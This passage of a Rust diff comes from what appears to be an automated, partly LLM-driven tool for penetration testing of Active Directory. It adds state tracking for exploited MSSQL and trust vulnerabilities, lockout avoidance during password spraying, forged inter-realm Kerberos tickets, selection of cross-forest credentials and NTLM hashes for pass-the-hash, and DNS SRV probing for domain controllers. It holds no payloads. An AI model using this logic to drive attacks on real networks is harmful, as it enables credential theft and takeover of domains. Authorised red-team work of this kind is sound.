"mssql_192_168_58_51".to_string(), + vuln("mssql_192_168_58_51", "mssql_access", "192.168.58.51", &[]), + ); + discovered.insert( + "mssql_impersonation_192.168.58.51".to_string(), + vuln( + "mssql_impersonation_192.168.58.51", + "mssql_impersonation", + "192.168.58.51", + &[], + ), + ); + let primary = discovered.get("mssql_impersonation_192.168.58.51"); + let out = compute_superseded("mssql_impersonation_192.168.58.51", primary, &discovered); + assert_eq!(out, vec!["mssql_192_168_58_51".to_string()]); + } + + #[test] + fn supersede_mssql_linked_server_supersedes_host_access() { + let mut discovered = HashMap::new(); + discovered.insert( + "mssql_192_168_58_254".to_string(), + vuln("mssql_192_168_58_254", "mssql_access", "192.168.58.254", &[]), + ); + let lsid = "mssql_linked_server_192.168.58.254_SQL".to_string(); + discovered.insert( + lsid.clone(), + vuln(&lsid, "mssql_linked_server", "192.168.58.254", &[]), + ); + let out = compute_superseded(&lsid, discovered.get(&lsid), &discovered); + assert_eq!(out, vec!["mssql_192_168_58_254".to_string()]); + } + + #[test] + fn supersede_mssql_does_not_match_other_hosts() { + let mut discovered = HashMap::new(); + discovered.insert( + "mssql_192_168_58_51".to_string(), + vuln("mssql_192_168_58_51", "mssql_access", "192.168.58.51", &[]), + ); + discovered.insert( + "mssql_impersonation_192.168.58.254".to_string(), + vuln( + "mssql_impersonation_192.168.58.254", + "mssql_impersonation", + "192.168.58.254", + &[], + ), + ); + let primary = discovered.get("mssql_impersonation_192.168.58.254"); + let out = compute_superseded("mssql_impersonation_192.168.58.254", primary, &discovered); + assert!(out.is_empty()); + } + + #[test] + fn supersede_dc_secretsdump_covers_trust_and_child_to_parent() { + let mut discovered = HashMap::new(); + discovered.insert( + "dc_secretsdump_fabrikam.local".to_string(), + vuln( + "dc_secretsdump_fabrikam.local", + "dc_secretsdump", + "192.168.58.58", + &[("domain", "fabrikam.local")], + ), + ); + discovered.insert( + "forest_trust_contoso.local_fabrikam.local".to_string(), + vuln( + "forest_trust_contoso.local_fabrikam.local", + "forest_trust_escalation", + "192.168.58.58", + &[("target_domain", "fabrikam.local")], + ), + ); + discovered.insert( + "child_to_parent_child_fabrikam".to_string(), + vuln( + "child_to_parent_child_fabrikam", + "child_to_parent", + "192.168.58.58", + &[("target_domain", "fabrikam.local")], + ), + ); + // Unrelated trust should NOT be superseded. + discovered.insert( + "forest_trust_fabrikam_child".to_string(), + vuln( + "forest_trust_fabrikam_child", + "forest_trust_escalation", + "192.168.58.150", + &[("target_domain", "child.contoso.local")], + ), + ); + let primary = discovered.get("dc_secretsdump_fabrikam.local"); + let mut out = compute_superseded("dc_secretsdump_fabrikam.local", primary, &discovered); + out.sort(); + assert_eq!( + out, + vec![ + "child_to_parent_child_fabrikam".to_string(), + "forest_trust_contoso.local_fabrikam.local".to_string(), + ] + ); + } + + #[test] + fn supersede_returns_empty_when_primary_missing() { + let discovered = HashMap::new(); + let out = compute_superseded("ghost", None, &discovered); + assert!(out.is_empty()); + } + + #[tokio::test] + async fn mark_exploited_propagates_to_superseded() { + let state = SharedState::new("op-1".to_string()); + let q = mock_queue(); + { + let mut s = state.inner.write().await; + s.discovered_vulnerabilities.insert( + "mssql_192_168_58_51".into(), + vuln("mssql_192_168_58_51", "mssql_access", "192.168.58.51", &[]), + ); + s.discovered_vulnerabilities.insert( + "mssql_impersonation_192.168.58.51".into(), + vuln( + "mssql_impersonation_192.168.58.51", + "mssql_impersonation", + "192.168.58.51", + &[], + ), + ); + } + + state + .mark_exploited(&q, "mssql_impersonation_192.168.58.51") + .await + .unwrap(); + + let s = state.inner.read().await; + assert!(s + .exploited_vulnerabilities + .contains("mssql_impersonation_192.168.58.51")); + assert!(s.exploited_vulnerabilities.contains("mssql_192_168_58_51")); + + let mut conn = q.connection(); + let members: std::collections::HashSet = + redis::AsyncCommands::smembers(&mut conn, "ares:op:op-1:exploited") + .await + .unwrap(); + assert!(members.contains("mssql_impersonation_192.168.58.51")); + assert!(members.contains("mssql_192_168_58_51")); + } + + #[tokio::test] + async fn record_exploit_failure_increments_counter() { + let state = SharedState::new("op-1".to_string()); + assert_eq!(state.record_exploit_failure("mssql_192_168_58_254").await, 1); + assert_eq!(state.record_exploit_failure("mssql_192_168_58_254").await, 2); + assert_eq!(state.record_exploit_failure("mssql_192_168_58_254").await, 3); + // Different vuln tracked independently. + assert_eq!(state.record_exploit_failure("other_vuln").await, 1); + } + + #[tokio::test] + async fn is_exploit_abandoned_below_threshold() { + let state = SharedState::new("op-1".to_string()); + for _ in 0..(MAX_EXPLOIT_FAILURES - 1) { + state.record_exploit_failure("vuln_a").await; + } + assert!(!state.is_exploit_abandoned("vuln_a").await); + assert!(!state.is_exploit_abandoned("never_failed").await); + } + + #[tokio::test] + async fn is_exploit_abandoned_at_and_above_threshold() { + let state = SharedState::new("op-1".to_string()); + for _ in 0..MAX_EXPLOIT_FAILURES { + state.record_exploit_failure("vuln_a").await; + } + assert!(state.is_exploit_abandoned("vuln_a").await); + // Further failures don't un-abandon. + state.record_exploit_failure("vuln_a").await; + assert!(state.is_exploit_abandoned("vuln_a").await); + } } diff --git a/ares-cli/src/orchestrator/state/domain_probe/dns_srv.rs b/ares-cli/src/orchestrator/state/domain_probe/dns_srv.rs new file mode 100644 index 00000000..15827b89 --- /dev/null +++ b/ares-cli/src/orchestrator/state/domain_probe/dns_srv.rs @@ -0,0 +1,68 @@ +//! DNS SRV-based domain prober. +//! +//! Real AD domains publish `_ldap._tcp.dc._msdcs.` SRV records. This +//! is the same lookup that NetExec, runZero, and BloodHound use to discover +//! domain controllers, and it serves equally well as a binary "is this a real +//! AD domain?" probe. +//! +//! Resolver behavior: +//! - We construct a `TokioAsyncResolver` from the system resolv.conf so we +//! pick up whatever recursive resolver the operator has configured (often +//! the same DNS server an attacker would query during real-world recon). +//! - NXDOMAIN / NoRecordsFound → `Rejected` (the suffix is definitely not AD). +//! - Successful answer with at least one SRV record → `Confirmed`. +//! - I/O / timeout / refused → `Indeterminate` (we'll retry next tick). + +use async_trait::async_trait; +use hickory_resolver::config::{ResolverConfig, ResolverOpts}; +use hickory_resolver::error::ResolveErrorKind; +use hickory_resolver::TokioAsyncResolver; + +use super::{DomainProber, ProbeOutcome}; + +/// Real DNS prober. Wraps a hickory `TokioAsyncResolver`. +pub struct DnsSrvProber { + resolver: TokioAsyncResolver, +} + +impl DnsSrvProber { + /// Construct using the system resolver (resolv.conf on Unix). + /// Falls back to a Cloudflare/Google config if system config is unreadable + /// — we still need *something* to query in container environments where + /// /etc/resolv.conf may be missing. + pub fn from_system() -> Self { + let resolver = match TokioAsyncResolver::tokio_from_system_conf() { + Ok(r) => r, + Err(e) => { + tracing::warn!(err = %e, "DNS SRV prober: system resolver unreadable, falling back to defaults"); + TokioAsyncResolver::tokio(ResolverConfig::default(), ResolverOpts::default()) + } + }; + Self { resolver } + } +} + +#[async_trait] +impl DomainProber for DnsSrvProber { + async fn probe(&self, fqdn: &str) -> ProbeOutcome { + let query = format!("_ldap._tcp.dc._msdcs.{}.", fqdn.trim_end_matches('.')); + match self.resolver.srv_lookup(&query).await { + Ok(answer) => { + if answer.iter().next().is_some() { + ProbeOutcome::Confirmed + } else { + ProbeOutcome::Rejected("no SRV records") + } + } + Err(e) => match e.kind() { + ResolveErrorKind::NoRecordsFound { .. } => { + ProbeOutcome::Rejected("NXDOMAIN / no _ldap._tcp.dc._msdcs SRV") + } + _ => { + tracing::debug!(fqdn = %fqdn, err = %e, "DNS SRV probe transient error"); + ProbeOutcome::Indeterminate + } + }, + } + } +} diff --git a/ares-cli/src/orchestrator/state/domain_probe/mod.rs b/ares-cli/src/orchestrator/state/domain_probe/mod.rs new file mode 100644 index 00000000..ec4f1713 --- /dev/null +++ b/ares-cli/src/orchestrator/state/domain_probe/mod.rs @@ -0,0 +1,45 @@ +//! Active probes that confirm whether a candidate FQDN is a real AD domain. +//! +//! `publishing::domains` records weak-evidence FQDNs as `CandidateDomain` +//! entries. The worker in this module periodically drains those candidates, +//! runs a probe (currently DNS SRV for `_ldap._tcp.dc._msdcs.`), and +//! either promotes confirmed results or drops rejections. +//! +//! Design notes: +//! - The trait abstracts the probe so unit tests can swap in a deterministic +//! stub. Real prober uses `hickory-resolver` against the system resolver, +//! which mirrors what BloodHound / NetExec / runZero do. +//! - DNS SRV is a reliable positive signal *and* a useful negative signal: +//! if `_ldap._tcp.dc._msdcs.` does not resolve, the suffix is not an +//! AD domain. We treat NXDOMAIN as `Rejected`; transient errors stay +//! `Indeterminate` so we retry later. +//! - CLDAP NetLogon ping (UDP/389) is the gold-standard probe used by +//! `DsGetDcName`. It is intentionally not implemented in this first cut — +//! it requires ~300 LoC of BER ASN.1 + raw UDP and adds a dependency. DNS +//! SRV alone matches industry practice for asset discovery and yields the +//! correctness improvement we want without the implementation cost. + +pub mod dns_srv; +pub mod worker; + +use async_trait::async_trait; + +pub use dns_srv::DnsSrvProber; +pub use worker::{spawn_domain_probe_worker, DomainProbeContext}; + +/// Result of probing a candidate domain. +#[derive(Debug, Clone, PartialEq, Eq)] +pub enum ProbeOutcome { + /// The probe positively identified an AD domain. Promote. + Confirmed, + /// The probe authoritatively says this is not an AD domain. Drop. + Rejected(&'static str), + /// Transient error or insufficient signal. Leave the candidate to retry. + Indeterminate, +} + +/// Pluggable domain prober. Implementers return a `ProbeOutcome` for an FQDN. +#[async_trait] +pub trait DomainProber: Send + Sync { + async fn probe(&self, fqdn: &str) -> ProbeOutcome; +} diff --git a/ares-cli/src/orchestrator/state/domain_probe/worker.rs b/ares-cli/src/orchestrator/state/domain_probe/worker.rs new file mode 100644 index 00000000..6cc76572 --- /dev/null +++ b/ares-cli/src/orchestrator/state/domain_probe/worker.rs @@ -0,0 +1,255 @@ +//! Periodic worker that drains candidate domains and probes them. +//! +//! Spawned once at orchestrator startup. Every 30 seconds it pulls the +//! current candidate set, probes each entry concurrently, and: +//! - Confirmed → `promote_domain` +//! - Rejected → `drop_candidate_domain` +//! - Indeterminate → `mark_candidate_probed` (back off; promotion can still +//! come from a stronger source landing later) +//! +//! Tick cadence is deliberately slow (30s vs 5s for `discovery_poller`): +//! domain promotion is not on the hot path of attack flow, and we don't want +//! to hammer DNS for transient resolution failures. The worker is also +//! resilient to shutdown — it joins the existing `watch::Receiver` +//! pattern used by every other background task. + +use std::sync::Arc; +use std::time::Duration; + +use redis::aio::ConnectionManager; +use tokio::sync::watch; +use tokio::task::JoinHandle; +use tracing::{debug, info}; + +use super::{DomainProber, ProbeOutcome}; +use crate::orchestrator::state::SharedState; +use crate::orchestrator::task_queue::TaskQueueCore; + +/// Wired-up dependencies for the probe worker. +pub struct DomainProbeContext { + pub state: SharedState, + pub queue: TaskQueueCore, + pub prober: Arc, +} + +/// Tick interval. Long enough to avoid DNS hammering, short enough that a +/// candidate landing mid-operation gets confirmed within tens of seconds. +const TICK_SECS: u64 = 30; + +/// Spawn the candidate-domain probe worker on a Tokio task. +pub fn spawn_domain_probe_worker( + ctx: DomainProbeContext, + shutdown: watch::Receiver, +) -> JoinHandle<()> { + tokio::spawn(async move { + run(ctx, shutdown).await; + }) +} + +async fn run(ctx: DomainProbeContext, mut shutdown: watch::Receiver) { + let mut interval = tokio::time::interval(Duration::from_secs(TICK_SECS)); + interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); + info!("Domain probe worker started"); + loop { + tokio::select! { + _ = interval.tick() => {}, + _ = shutdown.changed() => break, + } + if *shutdown.borrow() { + break; + } + drain_once(&ctx).await; + } + info!("Domain probe worker stopped"); +} + +async fn drain_once(ctx: &DomainProbeContext) { + let pending = ctx.state.pending_candidate_domains().await; + if pending.is_empty() { + return; + } + debug!(count = pending.len(), "Probing candidate domains"); + for cand in pending { + let outcome = ctx.prober.probe(&cand.fqdn).await; + match outcome { + ProbeOutcome::Confirmed => { + if let Err(e) = ctx.state.promote_domain(&ctx.queue, &cand.fqdn).await { + debug!(domain = %cand.fqdn, err = %e, "Promote after probe failed"); + } else { + info!(domain = %cand.fqdn, "Promoted candidate domain after DNS SRV probe"); + } + } + ProbeOutcome::Rejected(reason) => { + if let Err(e) = ctx + .state + .drop_candidate_domain(&ctx.queue, &cand.fqdn) + .await + { + debug!(domain = %cand.fqdn, err = %e, "Drop candidate failed"); + } else { + debug!(domain = %cand.fqdn, reason = %reason, "Dropped candidate domain (probe rejected)"); + } + } + ProbeOutcome::Indeterminate => { + if let Err(e) = ctx + .state + .mark_candidate_probed(&ctx.queue, &cand.fqdn) + .await + { + debug!(domain = %cand.fqdn, err = %e, "Mark probed failed"); + } + } + } + } +} + +#[cfg(test)] +mod tests { + use super::*; + use crate::orchestrator::task_queue::TaskQueueCore; + use ares_core::models::DomainEvidence; + use ares_core::state::mock_redis::MockRedisConnection; + use async_trait::async_trait; + use std::sync::Mutex; + + fn mock_queue() -> TaskQueueCore { + TaskQueueCore::from_connection(MockRedisConnection::new()) + } + + /// Test prober that returns a fixed outcome per FQDN. + struct StubProber { + results: Mutex>, + } + + impl StubProber { + fn new(entries: Vec<(&str, ProbeOutcome)>) -> Self { + let mut map = std::collections::HashMap::new(); + for (k, v) in entries { + map.insert(k.to_string(), v); + } + Self { + results: Mutex::new(map), + } + } + } + + #[async_trait] + impl DomainProber for StubProber { + async fn probe(&self, fqdn: &str) -> ProbeOutcome { + self.results + .lock() + .unwrap() + .get(fqdn) + .cloned() + .unwrap_or(ProbeOutcome::Indeterminate) + } + } + + /// Internal helper that runs one drain pass against a mock-backed state. + /// We can't call `drain_once` directly because the public `DomainProbeContext` + /// is parameterized on `ConnectionManager`, but the test substitutes + /// `MockRedisConnection`. Instead we replicate the loop body by hand. + async fn drain_with_mock( + state: &SharedState, + queue: &TaskQueueCore, + prober: &dyn DomainProber, + ) { + let pending = state.pending_candidate_domains().await; + for cand in pending { + match prober.probe(&cand.fqdn).await { + ProbeOutcome::Confirmed => { + state.promote_domain(queue, &cand.fqdn).await.unwrap(); + } + ProbeOutcome::Rejected(_) => { + state + .drop_candidate_domain(queue, &cand.fqdn) + .await + .unwrap(); + } + ProbeOutcome::Indeterminate => { + state + .mark_candidate_probed(queue, &cand.fqdn) + .await + .unwrap(); + } + } + } + } + + #[tokio::test] + async fn confirmed_candidate_is_promoted() { + let state = SharedState::new("op-1".into()); + let q = mock_queue(); + state + .publish_candidate_domain(&q, "contoso.local", DomainEvidence::HostnameInference, None) + .await + .unwrap(); + let prober = StubProber::new(vec![("contoso.local", ProbeOutcome::Confirmed)]); + drain_with_mock(&state, &q, &prober).await; + let s = state.inner.read().await; + assert!(s.domains.iter().any(|d| d == "contoso.local")); + assert!(s.candidate_domains.is_empty()); + } + + #[tokio::test] + async fn rejected_candidate_is_dropped() { + let state = SharedState::new("op-1".into()); + let q = mock_queue(); + state + .publish_candidate_domain( + &q, + "fake.example.com", + DomainEvidence::HostnameInference, + None, + ) + .await + .unwrap(); + let prober = StubProber::new(vec![("fake.example.com", ProbeOutcome::Rejected("nx"))]); + drain_with_mock(&state, &q, &prober).await; + let s = state.inner.read().await; + assert!(s.domains.is_empty()); + assert!(s.candidate_domains.is_empty()); + } + + #[tokio::test] + async fn indeterminate_candidate_marked_probed_but_kept() { + let state = SharedState::new("op-1".into()); + let q = mock_queue(); + state + .publish_candidate_domain( + &q, + "transient.example.com", + DomainEvidence::HostnameInference, + None, + ) + .await + .unwrap(); + let prober = StubProber::new(vec![]); + drain_with_mock(&state, &q, &prober).await; + let s = state.inner.read().await; + assert!(s.domains.is_empty()); + let cand = s.candidate_domains.get("transient.example.com").unwrap(); + assert!(cand.probed); + } + + #[tokio::test] + async fn probed_candidates_are_not_repolled() { + let state = SharedState::new("op-1".into()); + let q = mock_queue(); + state + .publish_candidate_domain( + &q, + "transient.example.com", + DomainEvidence::HostnameInference, + None, + ) + .await + .unwrap(); + // First pass: indeterminate → marked probed. + let prober = StubProber::new(vec![]); + drain_with_mock(&state, &q, &prober).await; + // Second pass should now skip the already-probed candidate. + let pending = state.pending_candidate_domains().await; + assert!(pending.is_empty()); + } +} diff --git a/ares-cli/src/orchestrator/state/inner.rs b/ares-cli/src/orchestrator/state/inner.rs index 552c0aec..b1964b9e 100644 --- a/ares-cli/src/orchestrator/state/inner.rs +++ b/ares-cli/src/orchestrator/state/inner.rs @@ -25,11 +25,22 @@ pub struct StateInner { pub users: Vec, pub shares: Vec, pub domains: Vec, + /// Domains discovered with evidence weaker than authoritative (typically + /// inferred from a host FQDN). Held here until the probe confirms or a + /// stronger source promotes them. Keyed by lowercase FQDN. + pub candidate_domains: HashMap, // Vulnerability tracking pub discovered_vulnerabilities: HashMap, pub exploited_vulnerabilities: HashSet, + // Per-vuln consecutive exploit-failure counts. Drives `is_exploit_abandoned` + // — once a vuln crosses MAX_EXPLOIT_FAILURES, the exploitation workflow + // skips it permanently for this op. Prevents 2-hour LLM stuck-loops on + // exploits whose preconditions (creds, reachable target, working tool) + // can never be satisfied. Operation-scoped, in-memory only. + pub exploit_failure_counts: HashMap, + // Maps pub domain_controllers: HashMap, pub netbios_to_fqdn: HashMap, @@ -69,12 +80,35 @@ pub struct StateInner { // KDC_ERR_CLIENT_REVOKED are quarantined to avoid burning auth budget. pub quarantined_credentials: HashMap>, + // Username lockout quarantine: `user@domain` → expiry time. + // Distinct from quarantined_credentials: tracks principals seen locked + // during enumeration paths (username_as_password, password_spray) where + // we have no specific cleartext credential to quarantine, only the + // principal itself. Used to filter user lists before re-dispatching + // enum tools so we don't keep incrementing badPwdCount on already-locked + // accounts. + pub quarantined_users: HashMap>, + + // Per-trust counter: how many times the cross-forest forge dispatch + // has been deferred waiting for the AES256 trust key to upsert. + // secretsdump runs twice (NTLM-only first, then AES-equipped) and + // Win2016+ targets reject RC4-only inter-realm tickets. Bound this + // so we don't defer indefinitely if AES never arrives. + pub forge_aes_defers: HashMap, + + // Forged inter-realm Kerberos tickets (source→target forest, cached path) + pub kerberos_tickets: Vec, + // Completion flag (set externally to signal operation should wrap up) pub completed: bool, + + /// Timestamp when all forests were first detected as dominated. + /// Used by the completion monitor to enforce a post-exploitation grace period. + pub all_forests_dominated_at: Option, } impl StateInner { - pub(super) fn new(operation_id: String) -> Self { + pub(crate) fn new(operation_id: String) -> Self { let mut dedup = HashMap::new(); for name in ALL_DEDUP_SETS { dedup.insert(name.to_string(), HashSet::new()); @@ -90,8 +124,10 @@ impl StateInner { users: Vec::new(), shares: Vec::new(), domains: Vec::new(), + candidate_domains: HashMap::new(), discovered_vulnerabilities: HashMap::new(), exploited_vulnerabilities: HashSet::new(), + exploit_failure_counts: HashMap::new(), domain_controllers: HashMap::new(), netbios_to_fqdn: HashMap::new(), domain_sids: HashMap::new(), @@ -108,7 +144,11 @@ impl StateInner { pending_tasks: HashMap::new(), completed_tasks: HashMap::new(), quarantined_credentials: HashMap::new(), + quarantined_users: HashMap::new(), + forge_aes_defers: HashMap::new(), + kerberos_tickets: Vec::new(), completed: false, + all_forests_dominated_at: None, } } @@ -149,6 +189,328 @@ impl StateInner { self.quarantined_credentials.insert(key, expiry); } + /// Check if a user is quarantined due to lockout observed during + /// enumeration. Expired quarantines are ignored (lazy cleanup). + pub fn is_user_quarantined(&self, username: &str, domain: &str) -> bool { + let key = format!("{}@{}", username.to_lowercase(), domain.to_lowercase()); + self.quarantined_users + .get(&key) + .map(|expiry| Utc::now() < *expiry) + .unwrap_or(false) + } + + /// Quarantine a user for `QUARANTINE_DURATION_SECS` after lockout. + pub fn quarantine_user(&mut self, username: &str, domain: &str) { + let key = format!("{}@{}", username.to_lowercase(), domain.to_lowercase()); + let expiry = Utc::now() + chrono::Duration::seconds(QUARANTINE_DURATION_SECS); + self.quarantined_users.insert(key, expiry); + } + + /// Return a deduplicated list of currently-quarantined usernames in + /// `domain` (case-insensitive). Used to populate `excluded_users` on + /// outbound spray dispatches so the worker can drop them before auth. + pub fn quarantined_users_in_domain(&self, domain: &str) -> Vec { + let domain_l = domain.to_lowercase(); + let now = Utc::now(); + let mut out: Vec = self + .quarantined_users + .iter() + .filter(|(_, expiry)| now < **expiry) + .filter_map(|(key, _)| { + let (user, dom) = key.split_once('@')?; + if dom == domain_l { + Some(user.to_string()) + } else { + None + } + }) + .collect(); + out.sort(); + out.dedup(); + out + } + + /// Resolve the DC IP for a domain. + /// + /// Checks `domain_controllers` first, then falls back to scanning the hosts + /// list for a DC whose FQDN suffix matches the domain. This is more robust + /// than relying solely on `domain_controllers`, which can have stale or + /// missing entries due to startup seed timing issues in multi-domain + /// environments. + pub fn resolve_dc_ip(&self, domain: &str) -> Option { + let domain_lower = domain.to_lowercase(); + // Tier 1: explicit DC map (case-insensitive) + if let Some(ip) = self.domain_controllers.get(&domain_lower).or_else(|| { + self.domain_controllers + .iter() + .find(|(k, _)| k.to_lowercase() == domain_lower) + .map(|(_, v)| v) + }) { + return Some(ip.clone()); + } + // Tier 2: scan hosts for a DC matching this domain by FQDN suffix + for host in &self.hosts { + if !(host.is_dc || host.detect_dc()) { + continue; + } + if host.hostname.is_empty() { + continue; + } + let parts: Vec<&str> = host.hostname.split('.').collect(); + if parts.len() >= 3 { + let host_domain = parts[1..].join(".").to_lowercase(); + if host_domain == domain_lower { + return Some(host.ip.clone()); + } + } + } + None + } + + /// Return all unique domains that have a resolvable DC. + /// + /// Merges domains from `domain_controllers`, `domains`, and `trusted_domains` + /// then filters to those where `resolve_dc_ip()` succeeds. Returns + /// `(domain, dc_ip)` pairs. + pub fn all_domains_with_dcs(&self) -> Vec<(String, String)> { + let mut seen = std::collections::HashSet::new(); + let mut result = Vec::new(); + + // Gather all known domain names (lowercased for dedup) + let mut all_domains: Vec = Vec::new(); + for d in self.domain_controllers.keys() { + all_domains.push(d.to_lowercase()); + } + for d in &self.domains { + all_domains.push(d.to_lowercase()); + } + for d in self.trusted_domains.keys() { + all_domains.push(d.to_lowercase()); + } + + for domain in all_domains { + if seen.contains(&domain) { + continue; + } + seen.insert(domain.clone()); + if let Some(ip) = self.resolve_dc_ip(&domain) { + result.push((domain, ip)); + } + } + + result + } + + /// Find a cleartext credential from a trusted domain that can authenticate + /// to `target_domain` via AD trust (child→parent or cross-forest). + /// + /// Used as a fallback when no same-domain cleartext credential exists. + /// Child-domain creds authenticate to parent DCs via the parent-child trust; + /// cross-forest creds authenticate via bidirectional forest trusts. + pub fn find_trust_credential( + &self, + target_domain: &str, + ) -> Option { + let target = target_domain.to_lowercase(); + + // Priority 1: child-domain cred → parent-domain (most reliable) + if let Some(c) = self.credentials.iter().find(|c| { + !c.password.is_empty() + && !self.is_credential_quarantined(&c.username, &c.domain) + && c.domain.to_lowercase().ends_with(&format!(".{target}")) + }) { + return Some(c.clone()); + } + + // Priority 2: cross-forest trusted domain cred (bidirectional trust) + // Check if any credential's domain has a trust with the target domain. + // Also falls back to discovered-domain heuristic: if both domains have + // known DCs in the same operation, they are likely in a trust relationship. + // LDAP bind will simply fail if there is no actual trust. + for cred in &self.credentials { + if cred.password.is_empty() + || self.is_credential_quarantined(&cred.username, &cred.domain) + { + continue; + } + let cred_dom = cred.domain.to_lowercase(); + if cred_dom == target { + continue; // same domain, not a trust fallback + } + let cred_forest = self.forest_root_of(&cred_dom); + let target_forest = self.forest_root_of(&target); + if cred_forest != target_forest { + // Explicit trust relationship known + if self.trusted_domains.contains_key(&target_forest) + || self.trusted_domains.contains_key(&cred_forest) + { + return Some(cred.clone()); + } + // Heuristic: both forests have DCs in this engagement — likely + // trust-related. LDAP bind will fail harmlessly if not. + let target_has_dc = self.domain_controllers.keys().any(|d| { + let d = d.to_lowercase(); + d == target_forest || self.forest_root_of(&d) == target_forest + }); + let cred_has_dc = self.domain_controllers.keys().any(|d| { + let d = d.to_lowercase(); + d == cred_forest || self.forest_root_of(&d) == cred_forest + }); + if target_has_dc && cred_has_dc { + return Some(cred.clone()); + } + } + } + + None + } + + /// Find a credential for the SOURCE user (the principal performing the + /// action), regardless of which TARGET domain the action is aimed at. + /// + /// Cross-forest ACL/MSSQL/ADCS exploitation has the source user living in + /// their own domain (e.g. `testuser@contoso.local`) while a vuln's + /// `domain` field points at the target (e.g. `fabrikam.local`). + /// Same-domain matching against the target therefore drops legitimate + /// cross-forest work. + /// + /// Selection priority: + /// 1. Cred whose domain matches the explicit `@domain` suffix of + /// `source_user`, if present. + /// 2. Cred whose domain == `target_domain` (same-domain case). + /// 3. Cred from a domain in a trust relationship with `target_domain` + /// (forest sibling, child↔parent, or trusted_domains entry). + /// 4. Any non-empty, non-quarantined cred with matching username. + pub fn find_source_credential( + &self, + source_user: &str, + target_domain: &str, + ) -> Option { + let (name, explicit_dom) = parse_principal(source_user); + let name_l = name.to_lowercase(); + let target_l = target_domain.to_lowercase(); + let target_forest = self.forest_root_of(&target_l); + + let usable = |c: &ares_core::models::Credential| -> bool { + !c.password.is_empty() + && !self.is_credential_quarantined(&c.username, &c.domain) + && c.username.to_lowercase() == name_l + }; + + if let Some(ref d) = explicit_dom { + if let Some(c) = self + .credentials + .iter() + .find(|c| usable(c) && c.domain.to_lowercase() == *d) + { + return Some(c.clone()); + } + } + + if let Some(c) = self + .credentials + .iter() + .find(|c| usable(c) && c.domain.to_lowercase() == target_l) + { + return Some(c.clone()); + } + + if let Some(c) = self.credentials.iter().find(|c| { + if !usable(c) { + return false; + } + let dom = c.domain.to_lowercase(); + if dom == target_l { + return false; + } + let cred_forest = self.forest_root_of(&dom); + cred_forest == target_forest + || self.trusted_domains.contains_key(&target_forest) + || self.trusted_domains.contains_key(&cred_forest) + }) { + return Some(c.clone()); + } + + self.credentials.iter().find(|c| usable(c)).cloned() + } + + /// NTLM-hash variant of [`find_source_credential`] with the same priority + /// order. Restricts to NTLM hashes (the only type usable for PTH). + pub fn find_source_hash( + &self, + source_user: &str, + target_domain: &str, + ) -> Option { + let (name, explicit_dom) = parse_principal(source_user); + let name_l = name.to_lowercase(); + let target_l = target_domain.to_lowercase(); + let target_forest = self.forest_root_of(&target_l); + + let usable = |h: &ares_core::models::Hash| -> bool { + !h.hash_value.is_empty() + && h.hash_type.eq_ignore_ascii_case("NTLM") + && !self.is_credential_quarantined(&h.username, &h.domain) + && h.username.to_lowercase() == name_l + }; + + if let Some(ref d) = explicit_dom { + if let Some(h) = self + .hashes + .iter() + .find(|h| usable(h) && h.domain.to_lowercase() == *d) + { + return Some(h.clone()); + } + } + + if let Some(h) = self + .hashes + .iter() + .find(|h| usable(h) && h.domain.to_lowercase() == target_l) + { + return Some(h.clone()); + } + + if let Some(h) = self.hashes.iter().find(|h| { + if !usable(h) { + return false; + } + let dom = h.domain.to_lowercase(); + if dom == target_l { + return false; + } + let cred_forest = self.forest_root_of(&dom); + cred_forest == target_forest + || self.trusted_domains.contains_key(&target_forest) + || self.trusted_domains.contains_key(&cred_forest) + }) { + return Some(h.clone()); + } + + self.hashes.iter().find(|h| usable(h)).cloned() + } + + /// Get the forest root for a domain. + /// If the domain is a child (e.g. `child.contoso.local`), the forest + /// root is the parent (e.g. `contoso.local`). Otherwise returns self. + pub fn forest_root_of(&self, domain: &str) -> String { + let d = domain.to_lowercase(); + // Check if this domain is a child of any known domain + for known in self.domains.iter() { + let k = known.to_lowercase(); + if d != k && d.ends_with(&format!(".{k}")) { + return k; + } + } + for known in self.domain_controllers.keys() { + let k = known.to_lowercase(); + if d != k && d.ends_with(&format!(".{k}")) { + return k; + } + } + d + } + /// Check if a dedup key exists in the named set. pub fn is_processed(&self, set_name: &str, key: &str) -> bool { self.dedup @@ -173,6 +535,34 @@ impl StateInner { .insert(key); } + /// Remove a key from the named dedup set so it can be retried. + pub fn unmark_processed(&mut self, set_name: &str, key: &str) { + if let Some(s) = self.dedup.get_mut(set_name) { + s.remove(key); + } + } + + /// Remove every key in `set_name` that starts with `prefix`. Returns the + /// removed keys so the caller can also drop them from the persisted store. + /// Used by trust automation to wake cross-forest fallback automations + /// (FSP/ACL/group enum) for a target domain when their dedup format is + /// `{kind}:{domain}[:tail]` — clearing all entries for a target without + /// knowing the full key. + pub fn unmark_processed_by_prefix(&mut self, set_name: &str, prefix: &str) -> Vec { + let Some(s) = self.dedup.get_mut(set_name) else { + return Vec::new(); + }; + let to_remove: Vec = s + .iter() + .filter(|k| k.starts_with(prefix)) + .cloned() + .collect(); + for k in &to_remove { + s.remove(k); + } + to_remove + } + /// Check if all discovered forests have been dominated (krbtgt obtained). /// /// Returns `true` when `compute_undominated_forests()` returns an empty list, @@ -194,6 +584,16 @@ impl StateInner { } } +/// Parse a principal string of form `name` or `name@domain.fqdn`. +/// Returns `(name, Some(domain_lower))` for the @-form, `(name, None)` for bare names. +fn parse_principal(s: &str) -> (&str, Option) { + if let Some((name, dom)) = s.split_once('@') { + (name, Some(dom.to_lowercase())) + } else { + (s, None) + } +} + #[cfg(test)] mod tests { use super::*; @@ -246,6 +646,29 @@ mod tests { assert_eq!(state.dedup[DEDUP_SECRETSDUMP].len(), 1); } + #[test] + fn unmark_processed_by_prefix_removes_matching() { + let mut state = StateInner::new("op-1".into()); + state.mark_processed(DEDUP_SECRETSDUMP, "xforest:fabrikam.local:dc01".into()); + state.mark_processed(DEDUP_SECRETSDUMP, "xforest:fabrikam.local:dc02".into()); + state.mark_processed(DEDUP_SECRETSDUMP, "xforest:contoso.local:dc01".into()); + state.mark_processed(DEDUP_SECRETSDUMP, "unrelated:key".into()); + let removed = + state.unmark_processed_by_prefix(DEDUP_SECRETSDUMP, "xforest:fabrikam.local:"); + assert_eq!(removed.len(), 2); + assert!(removed + .iter() + .all(|k| k.starts_with("xforest:fabrikam.local:"))); + assert_eq!(state.dedup[DEDUP_SECRETSDUMP].len(), 2); + } + + #[test] + fn unmark_processed_by_prefix_unknown_set_returns_empty() { + let mut state = StateInner::new("op-1".into()); + let removed = state.unmark_processed_by_prefix("does_not_exist", "x:"); + 